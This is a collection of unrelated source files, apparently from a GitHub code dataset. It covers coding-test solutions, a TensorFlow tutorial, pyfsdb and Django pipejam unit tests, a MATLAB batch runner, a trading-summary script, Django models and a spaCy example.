overwrite=True)\n","repo_name":"actions-security/tesla","sub_path":"tests/test_proxy_intervention_crs.py","file_name":"test_proxy_intervention_crs.py","file_ext":"py","file_size_in_byte":5533,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"18012205806","text":"# 내 풀이 (정답)\n# 각 행의 합, 각 열의 합, 두 대각선의 합 중 가장 큰 최대합 출력\nimport sys\n\nsys.stdin = open(\"input.txt\", \"r\")\nn = int(input())\nmatrix = [list(map(int, input().split())) for _ in range(n)]\nmatrix_col = list(zip(*matrix))\nresult = -2147000000 # 최대값\n\nfor i in range(n):\n result = max(result, sum(matrix[i])) # (1) 각 행의 합\n result = max(result, sum(matrix_col[i])) # (2) 각 열의 합\n\n# (3) 두 대각선의 합\ndiag0, diag1 = 0, 0\nfor i in range(n):\n diag0 += matrix[i][i] # [0, 0], [1, 1], ..., [4, 4]\n diag1 += matrix[i][-i - 1] # [0, -1], [1, -2], ..., [4, -5]\n\nresult = max(result, diag0, diag1)\n\nwith open(\"output6.txt\", \"a\") as f:\n print(result, file=f)\n\n\n# 정답 해설\nimport sys\n\nsys.stdin = open(\"input.txt\", \"r\")\nn = int(input())\na = [list(map(int, input().split())) for _ in range(n)]\nlargest = -2147000000\n\nfor i in range(n):\n sum1 = sum2 = 0\n for j in range(n):\n sum1 += a[i][j] # 행의 합\n sum2 += a[j][i] # 열의 합\n if sum1 > largest:\n largest = sum1\n if sum2 > largest:\n largest = sum2\n\nsum1 = sum2 = 0\nfor i in range(n):\n sum1 += a[i][i]\n sum2 += a[i][n - i - 1]\nif sum1 > largest:\n largest = sum1\nif sum2 > largest:\n largest = sum2\n\nprint(largest)\n\n\n# Test Case.\n# < input >\n# 5\n# 10 13 10 12 15\n# 12 39 30 23 11\n# 11 25 50 53 15\n# 19 27 29 37 27\n# 19 13 30 13 19\n\n# output : 155\n","repo_name":"donggrii/inflearn_coding_test","sub_path":"section3/6_격자판 최대합.py","file_name":"6_격자판 최대합.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"44369517047","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\n# 设定各种环境变量\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nos.environ['CUDA_VISIBLE_DEVICES'] = \"0\"\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth=True\n\ndef add_layer(inputs,in_size,out_size,n_layer,activation_function=None):\n layer_name = 'layer%s'%n_layer\n with tf.name_scope('layer'):\n with tf.name_scope('Weights'):\n Weights = tf.Variable(tf.random_normal([in_size,out_size]),name='W')\n # 在tensorboard中创建Weight的柱状图\n tf.summary.histogram(layer_name+'/Weights',Weights)\n with tf.name_scope('biases'):\n biases = tf.Variable(tf.zeros([1,out_size]) + 0.1,name='b')\n tf.summary.histogram(layer_name+'/biases',biases)\n with tf.name_scope('Wx_plus_b'):\n Wx_plus_b = tf.matmul(inputs,Weights) + biases\n if activation_function is None:\n outputs = Wx_plus_b\n else:\n outputs = activation_function(Wx_plus_b)\n tf.summary.histogram(layer_name+'/outputs',outputs)\n return outputs\n\n# 创建输入伪数据\nx_data = np.linspace(-1,1,300)[:,np.newaxis]\nnoise = np.random.normal(0,0.05,x_data.shape)\ny_data = np.square(x_data) - 0.5 + noise\n\nwith tf.name_scope('inputs'):\n xs = tf.placeholder(tf.float32,[None,1],name='x_input')\n ys = tf.placeholder(tf.float32,[None,1],name='y_input')\n\nl1 = add_layer(xs,1,10,n_layer=1,activation_function=tf.nn.relu)\n\nprediction = add_layer(l1,10,1,n_layer=2,activation_function=None)\n\nwith tf.name_scope('loss'):\n loss = tf.reduce_mean(tf.reduce_sum(tf.square(ys - prediction),reduction_indices=[1]))\n # 在tensorboard中创建loss的标量图\n tf.summary.scalar('loss',loss)\n\nwith tf.name_scope('train'):\n train_step = tf.train.GradientDescentOptimizer(0.1).minimize(loss)\n\ninit =tf.global_variables_initializer()\n\nwith tf.Session(config=config) as sess:\n # 打包程序中所有的结构\n merged = tf.summary.merge_all()\n # 创建tensorboard文件\n writer = tf.summary.FileWriter('logs/',sess.graph) # 'logs/'为目标event文件路径\n\n sess.run(init)\n for i in range(1000):\n sess.run(train_step,feed_dict={xs:x_data,ys:y_data})\n if i%50 == 0:\n # merged操作也需要被run\n result = sess.run(merged,feed_dict={xs:x_data,ys:y_data})\n writer.add_summary(result,i)\n\n# 查看tensorboard视图的方法:\n# 1、打开tenminal,cd到logs目录的父目录\n# 2、在terminal输入:tensorboard --logdir='logs',获取网址,这里为http://junjie-Toplap:6006\n# 3、用浏览器打开网址即可查看tensorboard视图\n# 注意:\n# 1、tensorflow为goole开发的module,所以最好使用chrome打开网址,使用其他浏览器可能会出现兼容的问题\n# 2、在部分windows系统的电脑上,使用终端获取的网址可能出现一些问题,\n# 可以将网址更换为:http://127.0.0.1:6006或http://localhost:6006,即本机IP的6006端口\n# 3、由于运行时环境变量的原因,有的电脑使用tensorboard时,\n# 需要将los目录放在python编译器(python或python3)的启动目录里\n# 4、在使用tensorboard视图时,不能关闭terminal中tensorboard的进程\n","repo_name":"851984709/Junjie-Hu","sub_path":"code/python/study/Tensorflow/7.tensorboard.py","file_name":"7.tensorboard.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"zh","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"23974859807","text":"from multiprocessing import Pool\nimport sys\nimport os\n\n\ndef function(cropped_dir):\n print('working on', cropped_dir)\n dipha_edge_filename = os.path.join(cropped_dir, 'dipha-thresh.edges')\n dimo_input_filename = os.path.join(cropped_dir, 'dipha-edges.txt')\n matlab_command = MATLAB_PATH + \" -r 'load_persistence_diagram(\" + '\"' + dipha_edge_filename + '\", \"' + dimo_input_filename + '\"); exit;' + \"'\"\n os.system(matlab_command)\n\n\nTHREADS = 1\nMATLAB_PATH = '~/apps/MATLAB/R2021a/bin/matlab'\n\ninput_dir = sys.argv[1]\ncropped_image_dirs = [os.path.join(input_dir, listing) for listing in os.listdir(input_dir)]\ncropped_image_dirs.sort()\n\npool = Pool(THREADS)\npool.map(function, cropped_image_dirs)\n","repo_name":"samik1986/DM_Lucas","sub_path":"Summarization/step_05_run_matlab.py","file_name":"step_05_run_matlab.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4506673265","text":"from io import StringIO\nimport unittest\nimport pyfsdb\nfrom logging import error\n\n\ndef noop():\n pass\n\n\nclass test_pdbrow(unittest.TestCase):\n def __init__(self, *args, **kwargs):\n super(test_pdbrow, self).__init__(*args, **kwargs)\n self.input_data = [\n {\"a\": 5, \"b\": 10, \"c\": 15},\n {\"a\": 2, \"b\": 4, \"c\": 8},\n {\"a\": 3, \"b\": 6, \"c\": 9},\n ]\n\n def test_load(self):\n from pyfsdb.tools.pdbrow import process_pdbrow\n\n self.assertTrue(True, \"could load\")\n\n def convert_to_stringio(self, data):\n outh = StringIO()\n outh.close = noop\n oh = pyfsdb.Fsdb(out_file_handle=outh)\n oh.out_column_names = list(data[0].keys())\n for row in data:\n oh.append(list(row.values()))\n oh.close()\n return StringIO(outh.getvalue())\n\n def get_standard_input(self):\n return self.convert_to_stringio(self.input_data)\n\n def base_test_and_assert(\n self,\n expression,\n expected_result,\n init_code=None,\n use_underbars=False,\n use_namedtuple=None,\n ):\n from pyfsdb.tools.pdbrow import process_pdbrow\n\n input_data_fsdb = self.get_standard_input()\n output_data = StringIO()\n output_data.close = noop\n\n process_pdbrow(\n input_data_fsdb,\n output_data,\n expression,\n init_code=init_code,\n use_underbars=use_underbars,\n use_namedtuple=use_namedtuple,\n )\n\n data = pyfsdb.Fsdb(\n file_handle=StringIO(output_data.getvalue()),\n return_type=pyfsdb.RETURN_AS_DICTIONARY,\n ).get_all()\n\n self.assertEqual(data, expected_result)\n\n def test_true_filtering(self):\n self.base_test_and_assert(\"True\", self.input_data)\n\n def test_filtering_equality(self):\n # result should be a slice of element 1\n self.base_test_and_assert(\"a == 2\", self.input_data[1:2])\n\n def test_filtering_multiplication(self):\n # result should be a slice of elements 0 and 2\n self.base_test_and_assert(\"c == a*3\", [self.input_data[0], self.input_data[2]])\n\n def test_filtering_math(self):\n # result should be a slice of element 1\n self.base_test_and_assert(\"c == a*a*a\", self.input_data[1:2])\n\n def test_filtering_logic(self):\n # result should be a slice of elements 0 and 2\n self.base_test_and_assert(\n \"c == a*3 and b == a*2\", [self.input_data[0], self.input_data[2]]\n )\n\n def test_filtering_logic_underbars(self):\n # result should be a slice of elements 0 and 2\n self.base_test_and_assert(\n \"_c == _a*3 and _b == _a*2\",\n [self.input_data[0], self.input_data[2]],\n use_underbars=True,\n )\n\n def test_regex(self):\n # result should be a slice of elements 0 and 2\n self.base_test_and_assert(\n \"re.match('3', str(a))\", [self.input_data[2]], \"import re\"\n )\n\n def test_defun(self):\n # result should be a slice of elements 0 and 2\n self.base_test_and_assert(\n \"testfun(a)\", [self.input_data[2]], \"def testfun(x):\\n return x == 3\"\n )\n\n def test_by_namedtupel(self):\n self.base_test_and_assert(\n \"row.c == row.a * 3 and row.b == row.a * 2\",\n [self.input_data[0], self.input_data[2]],\n use_namedtuple=\"row\",\n )\n","repo_name":"gawseed/pyfsdb","sub_path":"pyfsdb/tests/test_pdbrow.py","file_name":"test_pdbrow.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"40033664758","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2016/12/14 15:05\n\n@version: python3.5\n@author: qiding\n\n@files in:\ntrading record: \\\\\\\\SHIMING\\\\trading\\\\trading_summary\\\\today_str\ntarget: \\\\\\\\SHIMING\\\\trading\\\\target_files\ntarget No.7 adj E:\\\\MyTrading\\\\IntradayAccount\\\\Account\\\\No7DailyAccount\\\\today_str\\\\adj_data.csv\n\n@files out:\nE:\\\\MyTrading\\\\IntradayAccount\\\\Account\\\\AlphaAccountDailySummary\\\\today_str\\\\trading_summary.csv\nE:\\\\MyTrading\\\\IntradayAccount\\\\Account\\\\AlphaAccountDailySummary\\\\today_str\\\\ttrading_detail.csv\nE:\\\\MyTrading\\\\IntradayAccount\\\\Account\\\\AlphaAccountDailySummary\\\\today_str\\\\tdata_merge_all.csv\n\"\"\"\n\nimport os\nimport datetime\n\nimport my_path\nimport log\nimport mail\nimport trading_record\nimport trading_target\nimport stats\n\nimport trading_info\n\nmy_log = log.my_log\n\n\ndef main():\n # traded_account_list = [1, 2, 4, 5, 7, 8, 10, 11, 16, 19, 101, 102, 107, 203, 208, 301]\n\n traded_account_list = trading_info.traded_account_list\n id_account_mapping_table = trading_info.id_account_mapping_table\n\n account_id_mapping_table = dict(zip(id_account_mapping_table.values(), id_account_mapping_table.keys()))\n\n # ========================= date and log ==========================\n today = datetime.datetime.now()\n # today = datetime.datetime(2016,1,4)\n today_str = today.strftime('%Y%m%d')\n my_log.info('Alpha Daily Trading Account Begin @ {}'.format(today))\n my_log.info('trading account: {}'.format(','.join(str(t_) for t_ in traded_account_list)))\n\n # ========================= path ==========================\n output_path = my_path.output_path_root + today_str + '\\\\'\n output_path2 = my_path.output_path_root2 + today_str + '\\\\'\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n if not os.path.exists(output_path2):\n os.makedirs(output_path2)\n my_log.add_path(output_path + 'log.log')\n my_log.info('make dirs: {}'.format(output_path))\n\n first_px_path = [my_path.init_price_path_root + 'initprice_' + today_str + '.csv', my_path.init_price_path_root2 + 'initprice_' + today_str + '.csv']\n\n # ========================= tarding record ==========================\n trading_record_path = my_path.daily_trading_record_raw_path_root + today_str + '\\\\'\n trading_record_today = trading_record.get_trading_record(trading_record_path) # [account_name, coid, trading_price trading_volume]\n\n # trading_record_today = trading_record_today[trading_record_today['time'].apply(lambda x: x>='12:00:00')]\n\n my_log.info('generating csv file: {}'.format(output_path + 'trading_record_today.csv'))\n trading_record_today.to_csv(output_path + 'trading_record_today.csv', index=False)\n trading_record_today.to_csv(output_path2 + 'trading_record_today.csv', index=False)\n\n first_px_df = trading_record.get_first_price(first_px_path)\n my_log.info('generating csv file: {}'.format(output_path + 'first_price.csv'))\n first_px_df.to_csv(output_path + 'first_price.csv', index=False)\n first_px_df.to_csv(output_path2 + 'first_price.csv', index=False)\n\n # ========================= target ==========================\n target_today = trading_target.get_target(my_path.target_path_root, today_str, traded_account_list, id_account_mapping_table) # [coid, target, account_name]\n\n # ========================= stats ==========================\n trading_record_summary = stats.get_trading_summary(trading_record_today, first_px_df)\n trading_diff_summary, data_merge_all = stats.get_trading_diff_summary(trading_record_summary, target_today, account_id_mapping_table, first_px_df)\n my_log.info(trading_diff_summary)\n\n my_log.info('generating csv files: {}'.format(\n '\\n'.join([output_path+'trading_summary.csv', output_path+'trading_detail.csv', output_path + 'data_merge_all.csv'])\n ))\n trading_diff_summary.to_csv(output_path+'trading_summary.csv', index=False, na_rep='nan')\n trading_record_summary.to_csv(output_path + 'trading_detail.csv', index=False, na_rep='nan')\n data_merge_all.to_csv(output_path + 'account_detail.csv', index=False, na_rep='nan')\n trading_diff_summary.to_csv(output_path2+'trading_summary.csv', index=False, na_rep='nan')\n trading_record_summary.to_csv(output_path2 + 'trading_detail.csv', index=False, na_rep='nan')\n data_merge_all.to_csv(output_path2 + 'account_detail.csv', index=False, na_rep='nan')\n\n # email_message = trading_diff_summary.to_string(index=None)\n # email_message = 'We had something wrong with Account 7 in last email. Fixed now.'\n email_message = ''\n print('please print in additional message in email:')\n add_message = input()\n my_log.info(email_message+add_message)\n mail.send_email(\n email_message+add_message,\n [output_path+'trading_summary.csv', output_path + 'account_detail.csv'],\n today_str=today.strftime('%Y-%m-%d')\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"qiding321/alpha_account","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2330379877","text":"\"\"\"\nhttps://leetcode-cn.com/problems/all-nodes-distance-k-in-binary-tree/\n\n863. 二叉树中所有距离为 K 的结点\n给定一个二叉树(具有根结点 root), 一个目标结点 target ,和一个整数值 K 。\n\n返回到目标结点 target 距离为 K 的所有结点的值的列表。 答案可以以任何顺序返回。\n\n\n\n示例 1:\n\n输入:root = [3,5,1,6,2,0,8,null,null,7,4], target = 5, K = 2\n输出:[7,4,1]\n解释:\n所求结点为与目标结点(值为 5)距离为 2 的结点,\n值分别为 7,4,以及 1\n\n\n\n注意,输入的 \"root\" 和 \"target\" 实际上是树上的结点。\n上面的输入仅仅是对这些对象进行了序列化描述。\n\n\n提示:\n\n给定的树是非空的。\n树上的每个结点都具有唯一的值 0 <= node.val <= 500 。\n目标结点 target 是树上的结点。\n0 <= K <= 1000.\n\"\"\"\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Node:\n def __init__(self, x, left=None, right=None, parent=None, visited=False):\n self.val = x\n self.left = left\n self.right = right\n self.parent = parent\n self.visited = False\n\nclass Solution:\n def distanceK(self, root: TreeNode, target: TreeNode, K: int) -> List[int]:\n res = []\n new_target = None\n def f(root, parent=None):\n if root is None:\n return None\n new_root = Node(root.val, parent=parent)\n if root.left is not None:\n new_root.left = f(root.left, new_root)\n if root.right is not None:\n new_root.right = f(root.right, new_root)\n if root is target:\n nonlocal new_target\n new_target = new_root\n\n return new_root\n\n def h(node, level=0):\n if node is None or node.visited:\n return\n node.visited = True\n if level == K:\n res.append(node.val)\n return\n h(node.left, level + 1)\n h(node.right, level + 1)\n h(node.parent, level + 1)\n node.visited = False\n\n f(root)\n h(new_target)\n\n return res\n\n","repo_name":"ironboxer/leetcode","sub_path":"python/863.py","file_name":"863.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34522403520","text":"from copy import deepcopy\n\n\ndef add(l1, l2):\n return [deepcopy(l1), deepcopy(l2)]\n\n\ndef reduce(li):\n need_reduction = True\n has_exploded = False\n has_been_splited = False\n\n while(need_reduction):\n # print(\"\\n-----\")\n has_exploded = explode(li)\n if has_exploded and False:\n print(\"explode :\")\n print(li)\n if not has_exploded:\n has_been_splited = split(li)\n if has_been_splited and False:\n print(\"split :\")\n print(li)\n need_reduction = has_exploded or has_been_splited\n\n return li\n\n\ndef explode(li):\n has_exploded = [False]\n\n def dive(t, depth, b):\n if depth == 4 and not b[0]:\n # print(\"here\")\n g, d = t\n b[0] = True\n return True, False, g, False, d\n\n if (type(t) != list):\n return False, True, None, True, None\n\n # left branch\n if (type(t[0]) == list):\n processing, usedg, g, usedd, d = dive(t[0], depth + 1, b)\n if processing:\n # reset pair to 0\n if depth == 3:\n t[0] = 0\n if not usedd:\n # print(\"d :\", d)\n # dive into right branch\n if (type(t[1]) == int):\n t[1] += d\n else:\n a = t[1]\n while(type(a[0]) != int):\n a = a[0]\n a[0] += d\n return not usedg, usedg, g, True, None\n\n # right branch\n if (type(t[1]) == list):\n processing, usedg, g, usedd, d = dive(t[1], depth + 1, b)\n if processing:\n # reset pair to 0\n if depth == 3:\n t[1] = 0\n if not usedg:\n # print(\"g :\", g)\n # dive into left branch\n if (type(t[0]) == int):\n t[0] += g\n else:\n a = t[0]\n while(type(a[1]) != int):\n a = a[1]\n a[1] += g\n return not usedd, True, None, usedd, d\n\n return False, True, None, True, None\n\n dive(li, 0, has_exploded)\n return has_exploded[0]\n\n\ndef split(li):\n has_been_splited = [False]\n\n def dive(t, p, i, b):\n if type(t) == list:\n dive(t[0], t, 0, b)\n dive(t[1], t, 1, b)\n elif not b[0] and t >= 10:\n b[0] = True\n p[i] = [t // 2, (t + 1) // 2]\n else:\n return\n\n dive(li[0], li, 0, has_been_splited)\n dive(li[1], li, 1, has_been_splited)\n return has_been_splited[0]\n\n\ndef magnitude(t):\n if type(t) == list:\n return 3 * magnitude(t[0]) + 2 * magnitude(t[1])\n else:\n return t\n\n\nwith open(\"input/18.txt\") as file:\n lignes = list(map(lambda x: x[:-1], file.readlines()))\n vals = []\n for i in range(len(lignes)):\n vals.append(eval(lignes[i]))\n val = vals[0]\n for i in range(1, len(vals)):\n val = add(val, vals[i])\n reduce(val)\n print(\"résultat 1 : \", magnitude(val))\n print(val)\n\n mag = 0\n for i in range(len(vals)):\n for j in range(len(vals)):\n mag = max(mag, magnitude(reduce(add(vals[i], vals[j]))))\n print(\"résultat 2 :\", mag)\n","repo_name":"clementlrd/advent-of-code-2021","sub_path":"18.py","file_name":"18.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32056631063","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\n\n\nclass TeamMembers(models.Model):\n profile_picture = models.ImageField(upload_to='team_photos')\n name = models.CharField(max_length=100)\n description = models.TextField()\n\n class Meta:\n verbose_name = \"Team Member\"\n verbose_name_plural = \"Team Members\"\n\n def __str__(self):\n return self.name\n\n\nclass MethodologyEquation(models.Model):\n text = models.TextField()\n\n class Meta:\n verbose_name = \"Methodology Equation\"\n verbose_name_plural = \"Methodology Equations\"\n\n\nclass Disclaimer(models.Model):\n text = models.TextField()\n\n class Meta:\n verbose_name = \"Disclaimer\"\n verbose_name_plural = \"Disclaimers\"\n\n\nclass FAQ(models.Model):\n question = models.CharField(max_length=250)\n answer = models.TextField()\n\n class Meta:\n verbose_name = \"FAQ\"\n verbose_name_plural = \"FAQs\"\n\n def __str__(self):\n return self.question\n\n\nclass AboutSection(models.Model):\n text = models.TextField()\n\n class Meta:\n verbose_name = \"About Section\"\n verbose_name_plural = \"About Sections\"\n","repo_name":"raylenmargono/ValuationQuants","sub_path":"home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31585278505","text":"class Person:\n def __init__(self, name, job=None, pay=0):\n self.name = name\n self.job = job\n self.pay = pay\n def lastName(self): # Behavior methods\n return self.name.split()[-1] # self is implied subject\n def giveRaise(self, percent):\n self.pay = int(self.pay * (1 + percent)) # Must change here only\n def __repr__(self): # Added method\n return '[Person: %s, %s, %s]' % (self.name, self.pay, self.job) # String to print\n\nclass Manager(Person): # Inherit Person attrs\n def giveRaise(self, percent, bonus=.10): # Redefine to customize\n Person.giveRaise(self, percent+bonus)\n\nif __name__ == '__main__': # When run for testing only\n # self-test code\n bob = Person('Bob Smith')\n sue = Person('Sue Jones', job='dev', pay=100000)\n print(bob)\n print(sue)\n print(bob.lastName(), sue.lastName()) # Use the new methods\n sue.giveRaise(.10) # instead of hardcoding\n print(sue)\n tom = Manager('Tom Jones', 'mgr', 50000) # Make a Manager\n tom.giveRaise(.10) # Runs custom version\n print(tom.lastName()) # Runs inherited method\n print(tom) # Runs inherited __repr__","repo_name":"ajayatm/FSDS","sub_path":"Assignments/Python/Advanced/advanced2.py","file_name":"advanced2.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"230842946","text":"import spacy\n\n\ndef get_pps(doc):\n \"Function to get PPs from a parsed document.\"\n pps = []\n for token in doc:\n print(token.pos_)\n # Try this with other parts of speech for different subtrees.\n if token.pos_ == 'VERB':\n pp = ' '.join([tok.orth_ for tok in token.subtree])\n pps.append(pp)\n return pps\n\ndef get_vp(doc):\n \"Function to get PPs from a parsed document.\"\n pps = []\n vps = []\n vp = \"\"\n for token in doc:\n # Try this with other parts of speech for different subtrees.\n if token.pos_ == 'VERB':\n if vp == \"\":\n vp = str(token)\n else:\n vp += \" \" + str(token)\n elif vp != \"\":\n vps.append(vp)\n vp = \"\"\n return vps\n\n\nnlp = spacy.load('en')\n#ex = 'A short man in blue jeans is working in the kitchen.'\nex = \"I have been working my whole life and have nothing to show for it. I'm going to file a complaint to stop slavery.\"\nsentence = \"Lisa likes tennis. Lisa doesn't like tennis.\"\ndoc = nlp(sentence)\n\nprint(get_vp(doc))\n\n\nimport spacy,en_core_web_sm\nimport textacy\nnlp = en_core_web_sm.load()\n\npattern = r'?*+'\ndoc = nlp(sentence)\nlists = textacy.extract.pos_regex_matches(doc, pattern)\nfor list in lists:\n print(list.text)","repo_name":"venom1270/essay-grading","sub_path":"orangecontrib/essaygrading/spacy_phrase_test.py","file_name":"spacy_phrase_test.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"4776122497","text":"\nfrom django.test import TestCase\nfrom django.test.client import RequestFactory\nfrom django.core.exceptions import ImproperlyConfigured\n\nfrom django.test.utils import setup_test_template_loader, override_settings\nfrom django.template import Context, TemplateSyntaxError\nfrom django.template.loader import get_template\nfrom pipejam.processors import AssetRegistry\nfrom bs4 import BeautifulSoup\nimport bs4.element\n\nTEMPLATES = {\n 'pipeline/css.html': '',\n 'pipeline/js.html': '',\n 'pipejam/script.html': get_template('pipejam/script.html'),\n\n 'basetag': '''{% load pipejam %}{% assets 'js' %}{% assets 'css' %}''',\n 'test_one': '''\n {% load pipejam %}\n {% assets \"js\" %}\n {% assets \"css\" %}\n\n {% asset_ref \"angular\" %}\n {% asset_ref \"style1\" %}\n ''',\n\n 'test_two': '''\n {% load pipejam %}\n {% assets 'js' %}\n {% assets 'css' %}\n\n {% asset_ref 'style1' %}\n {% asset_ref 'angular' %}\n ''',\n 'test_three': '''\n {% load pipejam %}\n {% asset_ref 'style1' %}\n {% asset_ref 'angular' %}\n\n {% assets 'js' %}\n {% assets 'css' %}\n ''',\n\n 'base': '''\n {% load pipejam %}\n {% assets \"js\" %}\n {% assets \"css\" %}\n {% block bs %}\n {% endblock %}\n ''',\n\n 'extends': '''\n {% extends 'base' %}\n {% load pipejam %}\n {% block bs %}\n {% asset_ref \"style1\" %}\n {% asset_ref \"angular\" %}\n {% endblock %}\n ''',\n\n 'extends_outofblock': '''\n {% extends 'base' %}\n {% load pipejam %}\n {% asset_ref \"style1\" %}\n {% asset_ref \"angular\" %}\n ''',\n\n}\n\n\nsetup_test_template_loader(TEMPLATES)\n\nDEFAULT_SETTINGS = {\n 'STATIC_URL': '/static/',\n\n 'PIPEJAM_PROCESSORS': {\n 'js': {\n 'processor': 'pipejam.processors.PipelineScriptProcessor',\n },\n 'css': {\n 'processor': 'pipejam.processors.PipelineStylesheetProcessor',\n 'type': 'text/css',\n },\n },\n 'PIPELINE_JS': {\n 'angular': {\n 'source_files': (\n 'js/angular.js',\n ),\n 'output_filename': 'js/angular.bundle.js',\n 'deps': ['style1'],\n },\n },\n 'PIPELINE_CSS': {\n 'style1': {\n 'source_files': (\n 'css/style1.css',\n ),\n 'output_filename': 'css/style1.bundle.css',\n },\n },\n}\n\n\ndef render_with_request(template):\n return template.render(Context({'request': RequestFactory()}))\n\n@override_settings(**DEFAULT_SETTINGS)\nclass TagTests(TestCase):\n\n def test_it(self):\n registry = AssetRegistry()\n registry.add_asset_reference('angular', 'js')\n self.assertIn('angular', registry.assets['js'])\n self.assertIn('style1', registry.assets['css'])\n\n def test_simple(self):\n t = get_template('basetag')\n render_with_request(t)\n\n def test_one(self):\n t = get_template('test_one')\n vark = render_with_request(t)\n bs = BeautifulSoup(vark)\n a = (bs.find_all('script'))\n self.assertEqual(len(a), 1)\n self.assertEqual(a[0].attrs[\"src\"], \"/static/js/angular.bundle.js\")\n a = (bs.find_all('link'))\n self.assertEqual(len(a), 1)\n self.assertEqual(a[0].attrs[\"href\"], \"/static/css/style1.bundle.css\")\n\n def test_two(self):\n t = get_template('test_two')\n vark = render_with_request(t)\n bs = BeautifulSoup(vark)\n a = [x for x in bs.children if type(x) == bs4.element.Tag]\n self.assertEqual(a[0].name, \"script\")\n self.assertEqual(a[0].attrs[\"src\"], \"/static/js/angular.bundle.js\")\n self.assertEqual(a[1].name, \"link\")\n self.assertEqual(a[1].attrs[\"href\"], \"/static/css/style1.bundle.css\")\n\n def test_three(self):\n t = get_template('test_three')\n vark = render_with_request(t)\n bs = BeautifulSoup(vark)\n a = [x for x in bs.children if type(x) == bs4.element.Tag]\n self.assertEqual(a[0].name, \"script\")\n self.assertEqual(a[0].attrs[\"src\"], \"/static/js/angular.bundle.js\")\n self.assertEqual(a[1].name, \"link\")\n self.assertEqual(a[1].attrs[\"href\"], \"/static/css/style1.bundle.css\")\n\n def test_extends(self):\n t = get_template('extends')\n vark = render_with_request(t)\n bs = BeautifulSoup(vark)\n a = [x for x in bs.children if type(x) == bs4.element.Tag]\n self.assertEqual(a[0].name, \"script\")\n self.assertEqual(a[0].attrs[\"src\"], \"/static/js/angular.bundle.js\")\n self.assertEqual(a[1].name, \"link\")\n self.assertEqual(a[1].attrs[\"href\"], \"/static/css/style1.bundle.css\")\n\n def test_extends_outofblock(self):\n t = get_template('extends_outofblock')\n vark = render_with_request(t)\n # this no worky. why this no worky?\n self.assertEqual(vark.strip(), '')\n\n\nSETTINGS2 = {\n 'STATIC_URL': '/static/',\n\n 'PIPEJAM_PROCESSORS': {\n 'js': {\n 'processor': 'pipejam.processors.ScriptProcessor',\n },\n },\n 'PIPELINE_JS': {\n 'angular': {\n 'source_files': (\n 'js/angular.js',\n ),\n 'output_filename': 'js/angular.bundle.js',\n },\n 'angular-resource': {\n 'source_files': (\n 'js/angular-resource.js',\n ),\n 'output_filename': 'js/angular-resource.bundle.js',\n 'deps': ['angular'],\n },\n },\n}\n\n\n@override_settings(**SETTINGS2)\nclass AssetRegistryTests2(TestCase):\n\n def test_it(self):\n registry = AssetRegistry()\n registry.add_asset_reference('angular-resource', 'js')\n self.assertIn('angular-resource', registry.assets['js'])\n self.assertEqual(registry.assets['js']['angular-resource'], set([('angular','js')]))\n self.assertIn('angular', registry.assets['js'])\n self.assertEqual(registry.assets['js']['angular'], set())\n\n\nSETTINGS3 = {\n 'STATIC_URL': '/static/',\n\n 'PIPEJAM_PROCESSORS': {\n 'js': {\n 'processor': 'pipejam.processors.ScriptProcessor',\n },\n },\n 'PIPELINE_JS': {\n 'angular': {\n 'source_files': (\n 'js/angular.js',\n ),\n 'output_filename': 'js/angular.bundle.js',\n },\n 'angular-resource': {\n 'source_files': (\n 'js/angular-resource.js',\n ),\n 'output_filename': 'js/angular-resource.bundle.js',\n 'deps': ['angular'],\n },\n },\n}\n\n\n@override_settings(**SETTINGS3)\nclass AssetRegistryTests3(TestCase):\n\n def test_it(self):\n registry = AssetRegistry()\n registry.add_asset_reference('angular-resource', 'js')\n self.assertIn('angular-resource', registry.assets['js'])\n self.assertEqual(registry.assets['js']['angular-resource'], set([('angular','js')]))\n self.assertIn('angular', registry.assets['js'])\n self.assertEqual(registry.assets['js']['angular'], set())\n\n\nSETTINGS4 = {\n 'STATIC_URL': '/static/',\n\n 'PIPEJAM_PROCESSORS': {\n 'js': {\n 'processor': 'pipejam.processors.ScriptProcessor',\n },\n },\n 'PIPELINE_JS': {\n 'angular': {\n 'source_files': (\n 'js/angular.js',\n ),\n 'output_filename': 'js/angular.bundle.js',\n },\n 'angular-resource': {\n 'source_files': (\n 'js/angular-resource.js',\n ),\n 'output_filename': 'js/angular-resource.bundle.js',\n 'deps': [('angular','js')],\n },\n },\n}\n\n\n@override_settings(**SETTINGS4)\nclass AssetRegistryTests4(TestCase):\n\n def test_it(self):\n 